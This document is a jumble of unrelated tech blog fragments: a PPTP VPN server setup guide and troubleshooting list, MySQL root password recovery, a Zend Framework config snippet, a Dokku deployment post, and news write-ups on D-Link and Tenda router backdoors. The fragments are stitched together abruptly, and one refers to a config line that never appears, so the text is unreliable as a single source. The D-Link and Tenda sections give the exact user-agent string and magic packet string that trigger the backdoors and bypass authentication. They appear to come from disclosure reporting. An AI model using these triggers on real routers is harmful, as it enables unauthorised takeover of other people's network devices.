At this moment, my designer encounter problem to access target.com, an online shopping website to see some of the stuff for their design work. Target.com only allowed connections from USA and Canada at this moment due to their website crash issue last couple of weeks. Since this is quite urgent, I need to setup a VPN server so they can use it as a jump point to access websites in USA and Canada. I will use my MySQL server to serve as VPN server as well.
In this tutorial, I will use pptp as protocol to connect to VPN server using a username and password, with 128 bit MPPE encryption. Variable as below:
3. Once installed, open /etc/pptpd.conf using text editor and add following line:
localip 209.85.227.26
remoteip 209.85.227.27-30
4. Open /etc/ppp/options.pptpd and add authenticate method, encryption and DNS resolver value:
require-mschap-v2
require-mppe-128
ms-dns 8.8.8.8
5. Lets create user to access the VPN server. Open /etc/ppp/chap-secrets and add the user as below:
vpnuser pptpd myVPN$99 *
The format is: [username] [space] [server] [space] [password] [space][IP addresses]
6. We need to allow IP packet forwarding for this server. Open /etc/sysctl.conf via text editor and change line below:
net.ipv4.ip_forward = 1
7. Run following command to take effect on the changes:
$ sysctl -p
8. Allow IP masquerading in IPtables by executing following line:
$ iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
$ service iptables save
$ service iptables restart
Update: Once you have done with step 8, check the rules at /etc/sysconfig/iptables. Make sure that the POSTROUTING rules is above any REJECT rules.
9. Turn on the pptpd service at startup and reboot the server:
$ chkconfig pptpd on
$ init 6
Once the server is online after reboot, you should now able to access the PPTP server from the VPN client. You can monitor /var/log/messages for ppp and pptpd related log. Cheers!
If you are running PPTP VPN server (pptpd) on a Linux host, and your PPTP clients cannot open any web pages, here is a checklist for you to debug the problem:
Is there another client connected to the PPTP VPN server? If two clients are under the same NAT, they may not connect to the same PPTP VPN server at once. This is a limitation in PPTP implementation.
Does PPTP VPN server allow IP forwarding?Check kernel configuration on the PPTP server and make sure that ip_forward is enabled by running: # sysctl -a | grep ip_forwardIf you see net.ipv4.ip_forward = 0That means IP forwarding is not enabled and you must enable it. One way is to edit /etc/sysctl.conf and change/add the following line:net.ipv4.ip_forward = 1
Does PPTP VPN server firewall masquerade network interfaces? It is essential to configure firewall to masquerade public Internet network interface and ppp network interface, here are the firewall rules: iptables -A POSTROUTING -t nat -o eth0 -j MASQUERADE iptables -A POSTROUTING -t nat -o ppp+ -j MASQUERADE
Does PPTP VPN server have clamp-mss-to-pmtu set in iptables?If your VPN clients can visit certain websites but not others, then you are very likely encountering MTU problem. It can be fixed easily by the following iptables rule: iptables -A FORWARD -p tcp --tcp-flags SYN,RST SYN -j TCPMSS --clamp-mss-to-pmtu
Are DNS server addresses set correctly on PPTPD configuration?If your VPN clients can ping IP addresses (such as Google DNS 8.8.8.8) but not visiting any websites, then it is likely a DNS issue. You can set DNS server addresses on VPN clients, or set them on the VPN server's options.pptpd, change/add the following lines: ms-dns 8.8.8.8 ms-dns 8.8.4.4
You can recover MySQL database server password with following five easy steps.
Step # 1: Stop the MySQL server process.
Step # 2: Start the MySQL (mysqld) server/daemon process with the --skip-grant-tables option so that it will not prompt for password.
Step # 3: Connect to mysql server as the root user.
Step # 4: Setup new mysql root account password i.e. reset mysql password.
Step # 5: Exit and restart the MySQL server.
Here are commands you need to type for each step (login as the root user):
Step # 1 : Stop mysql service
# /etc/init.d/mysql stop Output:
Stopping MySQL database server: mysqld.
Step # 2: Start to MySQL server w/o password:
# mysqld_safe --skip-grant-tables & Output:
[1] 5988
Starting mysqld daemon with databases from /var/lib/mysql
mysqld_safe[6025]: started
Step # 3: Connect to mysql server using mysql client:
# mysql -u root Output:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1 to server version: 4.1.15-Debian_1-log
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql>
Step # 4: Setup new MySQL root user password
mysql> use mysql; mysql> update user set password=PASSWORD("NEW-ROOT-PASSWORD") where User='root'; mysql> flush privileges; mysql> quit
Step # 5: Stop MySQL Server:
# /etc/init.d/mysql stop Output:
Stopping MySQL database server: mysqld
STOPPING server from pid file /var/run/mysqld/mysqld.pid
mysqld_safe[6186]: ended
[1]+ Done mysqld_safe --skip-grant-tables
Then add a line to the config file (application/configs/application.ini). Since the library name won't be different between stages, I've put it in the base section (production):
1. I had to add something (doesn't matter what) after autoloadernamespaces. If I would have written 'autoloadernamespaces = "Amz_"', this would have yielded errors since an array is expected. By adding the ".amz" your making autoloadernamespaces into an array.
2. Instead of just "Amz" for my class prefix, I've added "Amz_". The reason for this is to avoid that "Amz111_" would also be accepted for my classes.
You might remember that in the virtual host we set up in the previous post, that we set the "APPLICATION_ENV" environment variable to development. Well, it comes into play here as well. APPLICATION_ENV decides what part of the config is loaded, so in our case it's the development part. When later on you set up your production environment, you set the variable to "production" and automatically it will use your production config. This enables you to have the same code on all your environments without the hastle of copying/modifying ini files liek in the old days.
My last infrastructure related post was about an experience of using AppFog and switching to Nodejitsu eventually. But that was not the end. In short: for Likeastore we needed SSL support, it happed that SSL is only available for Nodejitsu business plan, which price is 120 USD. That was simply to much for our small venture.
Long time ago, I realized – constrains are good. This case just proved that. Looking for alternative options, gave really nice results, which I easily could be re-used if you looking for simple deployment solutions.
Heroku
Heroku is good service. Afraid to be mistaken, but that’s probably Heroku who popularized “git-powered” deployments much, ones there deployment script looks like:
> git push heroku master
The rest is all about the service – prepare runtime, deploy code, start web application etc. Besides of that Heroku open-sourced a lot of good stuff, including so called buildpacks, some ready to use scripts that are able to setup the dyno with all required runtime to be able to start application there.
I never seriously used Heroku, though. What I dislike, is pricing. Also, the other people I asked about their satisfaction of using Heroku, was not satisfying much (arguable). We needed more lightweight, easy to change setup.
Digital Ocean
Digital Ocean is very fast growing cloud-computing service. It’s not PaaS (platform as a service) like Heroku, it’s rather IaaS (infrastructure as a service). They are notable for few major things:
Easy of use – the flow from registration for first droplet creation is smooth and clear.
Regions – machines can be fired up for both US and EU, ideal for us.
But again, Digital Ocean is nothing more as great infrastructure. Herding the server is all up to you. I personally was really afraid of that perspective of setting up nginx, configuring firewalls, load-balancing etc., that prevented me to look to Digital Ocean closely. Getting used to deployment procedures with Nodejitsu and Heroku, it’s real pain to deploy app by FTP again and do everything manually.
But lucky chance I noticed Dokku project and that was something really great, explain why later.
Dokku & Docker
So, Dokku is simply amazing hack (or more correctly, combination of diffrent hacks) by Jeff Lindsay. Some initial facts:
Written in Shell script and currently nearly 100 lines of code
Based on Docker
Provides Heroku-like deployment experience
Community-driven
Dokku, can be installed to Ubuntu 13 machine and turn that machine into Heroku-like server. I mean, you can push the code there and Dokku, will fire-up new docker process, deploy code there, start the application, configure nginx and setup environment variables and SSL.
Btw, the time I just looked to Dokku, they missed exactly support of ENV variables and SSL. It was not acceptable for me, without those 2 features. Constraints again, but that gave me ability to contribute the projects and eventually I submitted both features.
Dokku, is very interesting project. First of all, because it based on trendy Docker. Docker is “Virtual-Machine-Based-Deployment” alternative. Deployment on virtual boxes are de-facto standard now and docker is about to change that. Guys from dotCloud open-sourced solution that allows to run isolated processes (containers) – that are like lightweight virtual machines. You can deploy docker on Ubuntu server and then use that as host any kind of applications or databases.
Docker could turn Ubuntu Server to PaaS and Dokku makes great “interface” for that.
Each Dokku piece is very interesting indeed and I hope to blog more about. And Dokku is using Heroku buildbacks, which makes you feel you deal with Heroku, not with your own setup.
Putting Things Together
Digital Ocean and Dokku make a perfect match. As I said above, Digital Ocean is something you can really start quick with. So, what we did is just started up 10$ Ubuntu 13 server and installed Dokku there. In total it took 7 minutes or so. I would not bother you with instructions, cause you find a lot in internet.. but also, assuming that DO + Dokku is a kind of Apple product, that does not require instructions.
First impression was simply amazing. You have everything under control and fill great with “git-powered” deployments. So, after successful try that machine became our staging server and I also fired-up another one for production one.
Now, then we developing features and what to show each other or test, you just need to do following:
> git push deploy-staging feature:master
Counting objects: 7, done.
Delta compression using up to 8 threads.
Compressing objects: 100% (4/4), done.
Writing objects: 100% (4/4), 445 bytes | 0 bytes/s, done.
Total 4 (delta 2), reused 0 (delta 0)remote: -----> Building collector ...
remote: Node.js app detected
remote: -----> Resolving engine versions
remote: Using Node.js version: 0.10.15
remote: Using npm version: 1.2.30
remote: -----> Fetching Node.js binaries
remote: -----> Vendoring node into slug
remote: -----> Installing dependencies with npm
remote: npm WARN package.json likeastore-collector@0.0.2-21 No repository field.
remote: npm http GET https://registry.npmjs.org/mongojs
remote: npm http GET https://registry.npmjs.org/underscore
...
remote: =====> Application deployed:
remote: http://stage-collector.likeastore.com
The time we are ready to release:
> git push deploy-production master
Counting objects: 7, done.
Delta compression using up to 8 threads.
...
remote: =====> Application deployed:
remote: http://collector.likeastore.com
It’s fast and it’s pretty reliable.
For conclusion, I would say that using both Digial Ocean and Dokku was a clear win for Likeastore being released.
A number of D-Link routers reportedly have an issue that makes them susceptible to unauthorized backdoor access.
The researcher Craig, specialized on the embedded device hacking - demonstrated the presence of a backdoor within some DLink routers that allows an attacker to access the administration web interface of network devices without any authentication and view/change its settings.
He found the backdoor inside the firmware v1.13 for the DIR-100 revA. Craig found and extracted the SquashFS file system loading firmware’s web server file system (/bin/webs) into IDA.
Giving a look at the string listing, the Craig's attention was captured by a modified version of thttpd, the thttpd-alphanetworks/2.23, implemented to provide the rights to the administrative interface for the router.
The library is written by Alphanetworks, a spin-off company of D-Link, analyzing it Craig found many custom functions characterized by a name starting with suffix “alpha” including the alpha_auth_check.
The function is invoked to parse http request in the phase of authentication.
"We can see that alpha_auth_check is passed one argument (whatever is stored in register $s2); if alpha_auth_check returns -1 (0xFFFFFFFF), the code jumps to the end of alpha_httpd_parse_request, otherwise it continues processing the request."
Analyzing the parameters passed to the function the researcher was able to reconstruct the authentication flow, the function parses the requested URL and check if it contains the strings “graphic/” or “public/”. “graphic/” or “public/” are sub-directories under the device’s web directory, if the requested URL contains one of them the request is passed without authentication.
Another intriguing detail has been found by Craig that by changing the user-agent in a web browser to “xmlset_roodkcableoj28840ybtide,” a user could bypass the security on the device and get online or control the higher functions of the router.
Craig decided to search the code “xmlset_roodkcableoj28840ybtide” on Google and discovered traces of it only in one Russian forum post from a few years ago. Going deep in its analysis Craig was able to piece together the body of the alpha_auth_check:
int alpha_auth_check(struct http_request_t *request)
// These arguments are probably user/pass or session info
if(check_login(request->0xC, request->0xE0) != 0)
{
return AUTH_OK;
}
}
return AUTH_FAIL;
}
Try to read the string xmlset_roodkcableoj28840ybtide backwards .... It appears as "Edit by 04882 Joel backdoor", very cool.
The worrying part about this vulnerability is how it can be exploited. Anyone connected to the router, whether it's through Ethernet or Wi-Fi, can simply set their browser's user agent string to a specific codeword and then attempt to access the web configuration panel.
Craig extended the results of its discovery to many other D-Link devices affected by the same backdoor, the author searched for the code present in the HTML pages on the entire Internet with the Shodan. He searched for the word "thttpd-alphanetworks/2.23", the modified version of thttpd, retrieving following search results:
After a series of test Craig concluded that the following D-Link devices are likely affected:
• DIR-100
• DI-524
• DI-524UP
• DI-604S
• DI-604UP
• DI-604+
• TM-G5240
The researcher discovered also that Planex routers, based on the same firmware, are affected by the flaw.
• BRL-04UR
• BRL-04CW
D-Link has confirmed that the flaw exists, but has refused to provide comment on how it was inserted into its products. 'D-Link will be releasing firmware updates to address the security vulnerabilities in affected D-Link routers by the end of October,' a company spokesperson explained.
Very intriguing ... What do you think about?
Update (1:43 PM Wednesday, October 16, 2013 GMT): Nmap script is now available for automated scan and identifying the vulnerable D-Link routers, models including - DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, TM-G5240.
Last week Craig Heffner, specialized on the embedded devicehacking exposed a serious backdoor in number ofD-Link routersallows unauthorized backdoor access.
Recently he published his another researcher, Titled 'From China, With Love', exposed that D-Link is not only the vendor who puts backdoors in their products. According to him, China based networking device and equipment manufacturer - TendaTechnology (www.tenda.cn) also added potential backdoors into their Wireless Routers.
He unpacked the software framework update and locate the httpd binary an found that the manufacturer is using GoAhead server, which has been substantially modified.
These routers are protected with standard Wi-Fi Protected Setup (WPS) and WPA encryption key, but still by sending a UDP packet with a special string , an attacker could take over the router.
Routers contain a flaw in the httpd component, as the MfgThread() function spawns a backdoor service that listens for incoming messages containing commands to execute. A remote attacker with access to the local network can execute arbitrary commands with root privileges, after access.
He observed that, attacker just need run the following telnet server command on UDP port 7329, in order of root gain access:
Where, "w302r_mfg" is the magic string to get access via backdoor.
Some of the vulnerable routers are W302R and W330R as well as re-branded models, such as the Medialink MWN-WAPR150N. Other Tenda routers are also possibly affected. They all use the same “w302r_mfg” magic packet string.
Nmap NSE script to test for the backdoored routers – tenda-backdoor.nse is also available for penetration testing.